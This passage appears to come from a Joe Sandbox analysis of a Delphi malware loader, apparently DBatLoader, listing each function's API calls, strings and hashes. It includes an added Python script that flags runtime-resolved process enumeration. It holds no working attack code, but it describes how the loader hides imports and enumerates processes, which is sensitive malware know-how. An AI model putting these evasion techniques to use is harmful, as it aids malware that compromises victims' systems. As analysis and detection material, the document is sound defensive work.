                                                                                                                                                                    • Opcode ID: 0c3538f7e696272063f7a9bbab7d2b773f046206e25feff5d4cdf45934380b63
                                                                                                                                                                    • Instruction ID: c617261a92baa0a28d6e0cba63406468ea36cb5df914e7ef2a0902a774c73e14
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c3538f7e696272063f7a9bbab7d2b773f046206e25feff5d4cdf45934380b63
                                                                                                                                                                    • Instruction Fuzzy Hash: C331FCBCA852649FFB10BFA8D885E2933EDAB467007511969F419DF305E778E418CF12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
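The function above resolves the whole Toolhelp32 family (CreateToolhelp32Snapshot through Module32NextW) by name through GetProcAddress instead of importing it, so none of those symbols show up in the PE import table; the only static trace is the string list, and the capability is only visible in a listing like this one or in a runtime API trace. The following script turns these per-function listings into a flagged summary so the process-enumeration cluster is not lost in a report of this length. It is an added triage example, not part of the Joe Sandbox report or of the sample: the input block is constructed from lines of this report, and the TOOLHELP32 set and the flag vocabulary are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function API listings and flag capability clusters.

Added example. SAMPLE is constructed from lines of this report; the
TOOLHELP32 set and the flag names below are this example's own choices,
not Joe Sandbox output.
"""
import re
from typing import Dict, List

# The sixteen Toolhelp32 enumeration routines the function above resolves.
TOOLHELP32 = frozenset({
    "CreateToolhelp32Snapshot", "Toolhelp32ReadProcessMemory",
    "Process32First", "Process32Next", "Process32FirstW", "Process32NextW",
    "Thread32First", "Thread32Next",
    "Module32First", "Module32Next", "Module32FirstW", "Module32NextW",
    "Heap32First", "Heap32Next", "Heap32ListFirst", "Heap32ListNext",
})

# Constructed input: a few lines copied from two function blocks of this report.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028D9BC0
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 028D9C2C
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028D9C3E
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028D9C74
Strings
Similarity
• API ID: AddressProc$HandleModule
• Opcode ID: 0c3538f7e696272063f7a9bbab7d2b773f046206e25feff5d4cdf45934380b63
Uniqueness Score: -1.00%
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C58E9
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028C5900
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59DD
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59EF
Similarity
• Opcode ID: ed7c6c4611d8e4e69edb528536b6c1f82ee73dad1f725820ce7c6c2aa9c9a3ab
Uniqueness Score: -1.00%
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: 028D9BC0"
API_LINE = re.compile(
    r"^\u2022\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
OPCODE_LINE = re.compile(r"^\u2022\s*Opcode ID: (?P<id>[0-9a-f]{64})$")


def parse_functions(text: str) -> List[Dict]:
    """Split the listing into per-function records.

    Every 'APIs' header starts a new function. Direct calls are recorded by
    API name; for GetProcAddress the second argument is the symbol resolved
    at run time, so it is recorded under 'resolved' instead.
    """
    functions: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"opcode_id": None, "direct_apis": set(),
                       "resolved": set(), "refs": []}
            functions.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current["direct_apis"].add(m["api"])
            current["refs"].append(m["ref"].upper())
            if m["api"] == "GetProcAddress":
                args = [a.strip() for a in m["args"].split(",")]
                if len(args) >= 2 and args[1] != "?":
                    current["resolved"].add(args[1])
            continue
        m = OPCODE_LINE.match(line)
        if m:
            current["opcode_id"] = m["id"]
    for fn in functions:
        fn["direct_apis"] = sorted(fn["direct_apis"])
        fn["resolved"] = sorted(fn["resolved"])
    return functions


def flag_function(fn: Dict) -> List[str]:
    """Label a function by the capability clusters its API set touches."""
    flags: List[str] = []
    direct = set(fn["direct_apis"])
    resolved = set(fn["resolved"])
    if "GetProcAddress" in direct:
        flags.append("dynamic-resolution")
    if resolved & TOOLHELP32:
        # Symbols resolved by name never reach the PE import table, so a
        # static import scan alone would miss this capability.
        flags.append("process-enumeration:runtime-resolved")
    if direct & TOOLHELP32:
        flags.append("process-enumeration:direct")
    if direct & {"LoadLibraryA", "LoadLibraryExA", "LoadLibraryW", "LoadLibraryExW"}:
        flags.append("loads-library")
    return flags


def summarize(text: str) -> List[Dict]:
    """Parse and flag every function block in a listing."""
    result = []
    for fn in parse_functions(text):
        fn["flags"] = flag_function(fn)
        result.append(fn)
    return result


if __name__ == "__main__":
    for fn in summarize(SAMPLE):
        print(fn["opcode_id"][:16], fn["refs"][0], fn["flags"], fn["resolved"])
```

Feed it the whole report text and sort by flags to get the handful of functions worth opening in the snapshot. The lstrcpynA/LoadLibraryExA function further down, with its Software\Borland\Delphi\Locales and Software\Borland\Locales registry keys, is the standard Delphi runtime resource-module lookup (DBatLoader is Delphi-built), so it only earns the loads-library label here; that block is a compiler fingerprint, not a behaviour to pivot on.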

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C58E9
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028C5900
• lstrcpynA.KERNEL32(?,?,?), ref: 028C5930
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C5994
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59CA
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59DD
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59EF
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59FB
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000), ref: 028C5A2F
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0), ref: 028C5A3B
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028C5A5D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: ed7c6c4611d8e4e69edb528536b6c1f82ee73dad1f725820ce7c6c2aa9c9a3ab
• Instruction ID: fccd7edac98ad664cb082de3c69adc72d706b7d191910b98935b1a89f2c13c46
• Opcode Fuzzy Hash: ed7c6c4611d8e4e69edb528536b6c1f82ee73dad1f725820ce7c6c2aa9c9a3ab
• Instruction Fuzzy Hash: 58415F7ED00218ABDF10DAE8CCC8ADEB7ADAF08344F6445A9A549E7241D738EF448F54
Uniqueness
• Uniqueness Score: -1.00%

APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028C5BAC
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028C5BB9
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028C5BBF
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028C5BEA
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C31
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C41
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C69
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C79
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028C5C9F
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028C5CAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
• Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
• Instruction ID: 88991048baa02a8ddb48026bc646f947b5a66d48469d23bd162bebc7b4ad58b9
• Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
• Instruction Fuzzy Hash: E13184BDE4011C2AFF25D6B8DC89BDEB6AD4B04380F6401A99648F6185D778EF848F51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028C7FB1
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
• Instruction ID: c9cf39e939768046a42d86fe0dde7e2ef03f2a1055ac4f8d714092c85866a2ff
• Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
• Instruction Fuzzy Hash: 2D1100B5A00209AFDB00CFA9C881DAFF7F9EFC8300B14C569A408E7254E7319A018B90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction ID: a742a2c12f52007bd259335c02a2ee2a2398186611fe553f06b3f1fcc2bd929b
• Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
• Instruction Fuzzy Hash: 96E0D87D70021817D314A95C5C90DF6726DA75C710F20417EBD48C7341EFB0DD804AE5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32(?,028EA106,00000000,028EA11E), ref: 028CB756
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: c07fd1f28872ad038c6979fca20010ca5ef19f781ea45afaaa3b290fa5bb9b2f
• Instruction ID: 6637831c3fe151ff94b4b7eb03abe38880110cf8fda18755c3456c01eb221826
• Opcode Fuzzy Hash: c07fd1f28872ad038c6979fca20010ca5ef19f781ea45afaaa3b290fa5bb9b2f
• Instruction Fuzzy Hash: B8F07F7C944702ABCB50DF28D84261577E5FB89618F14892DE899CAB80E734D8548F52
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028CBE2E,00000000,028CC047,?,?,00000000,00000000), ref: 028CA7DF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                    • Instruction ID: 9dba74365196c05f24c6e4997e18ee8fd2bc0e5c50adbebfb573617a43f62752
                                                                                                                                                                    • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                    • Instruction Fuzzy Hash: E9D05B6E30D1643AA224555E1D44D775AECDAC5761F10443DB588C6201D310CC059671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 481472006-0
                                                                                                                                                                    • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                                                                    • Instruction ID: 44d2cc4acf89573b8c847e09e6f5a52e78866faa318030a8423ca2bb819e4ee9
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                                                                    • Instruction Fuzzy Hash: E3A01208404C31018140371C0C0253530445840620FD4076468F8802D1FA2D412440D3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028CD259
                                                                                                                                                                      • Part of subcall function 028CD224: GetProcAddress.KERNEL32(00000000), ref: 028CD23D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                                                                                    • Opcode ID: 8f53572a1104ec97ec0fc2f886ee5fc50b5644aea07e34caa421cbb0728c90dd
                                                                                                                                                                    • Instruction ID: 0532d32202fa3ba8b218ea94bf017de79071990322372d5bf904effae0a6a5ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f53572a1104ec97ec0fc2f886ee5fc50b5644aea07e34caa421cbb0728c90dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 64413FADA482049B52287B6E740043777DAD745720371A43EB718DB708DFB0FC5E8E2A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 028D6E9A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028D6EAB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028D6EBB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028D6ECB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028D6EDB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028D6EEB
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 028D6EFB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                                                                    • Opcode ID: 2e928e768aae6192d20edf1fcc51769582f98481c13c348f4249c789a59b9e5f
                                                                                                                                                                    • Instruction ID: 1a05ae1fb983376065480a3405d9f21e80a7195418ae589d3e986215725ef334
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e928e768aae6192d20edf1fcc51769582f98481c13c348f4249c789a59b9e5f
                                                                                                                                                                    • Instruction Fuzzy Hash: BBF09EAC9CB779ADBF007B746C82D2A275DA951648350182DB426E9F42FB78C4284B21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028C28CE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message
                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                                                                    • Opcode ID: 4bbb8b04d3936a124e7fd1b0cc0f607496fecf745ea47707c77da9e5325a85ed
                                                                                                                                                                    • Instruction ID: d16e1e0290c5b6153278a2423991aa25a051689e0c641883dc51455bbebea071
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbb8b04d3936a124e7fd1b0cc0f607496fecf745ea47707c77da9e5325a85ed
                                                                                                                                                                    • Instruction Fuzzy Hash: 8CA1D43CA042688BDB21AA2CCC84B9976E5EB09314F2441E9DD4DDB3CACB75D989CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028DA078
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028DA08F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 028DA095
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 028DA123
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 028DA12F
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 028DA143
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 028DA08A
                                                                                                                                                                    • LoadLibraryExA, xrefs: 028DA085
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                                                                                    • Opcode ID: 6e13afb2d5cd9931d9239f7ce323e0febcd32c2dd9c0b2a79a42914b231ae565
                                                                                                                                                                    • Instruction ID: 29d90815412eec7f7ec0e6aa835022ed0bb88f8f8077431be7a224806c505041
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e13afb2d5cd9931d9239f7ce323e0febcd32c2dd9c0b2a79a42914b231ae565
                                                                                                                                                                    • Instruction Fuzzy Hash: B731837DA40315BBDF24DF68CC81F5AB7ACAF45354F244528FA19EB281E334E9448B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028C2849
                                                                                                                                                                    • bytes: , xrefs: 028C275D
                                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 028C2707
                                                                                                                                                                    • 7, xrefs: 028C26A1
                                                                                                                                                                    • Unexpected Memory Leak, xrefs: 028C28C0
                                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 028C2690
                                                                                                                                                                    • , xrefs: 028C2814
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                                    • Opcode ID: 2ac129e020d0d8611efa9cb7bd6d64168e8c03936bdbeff0c6effd9785b62b2c
                                                                                                                                                                    • Instruction ID: 1aa9ae92283e0268be9687c1b39d559dfc50505652fc89c8b5f5715e443acc4e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac129e020d0d8611efa9cb7bd6d64168e8c03936bdbeff0c6effd9785b62b2c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C71943CA042588EDF21AA2CCC84B99B6E5EB09714F2041E9D94DD72CADB75C989CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,028CC047,?,?,00000000,00000000), ref: 028CBDB2
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
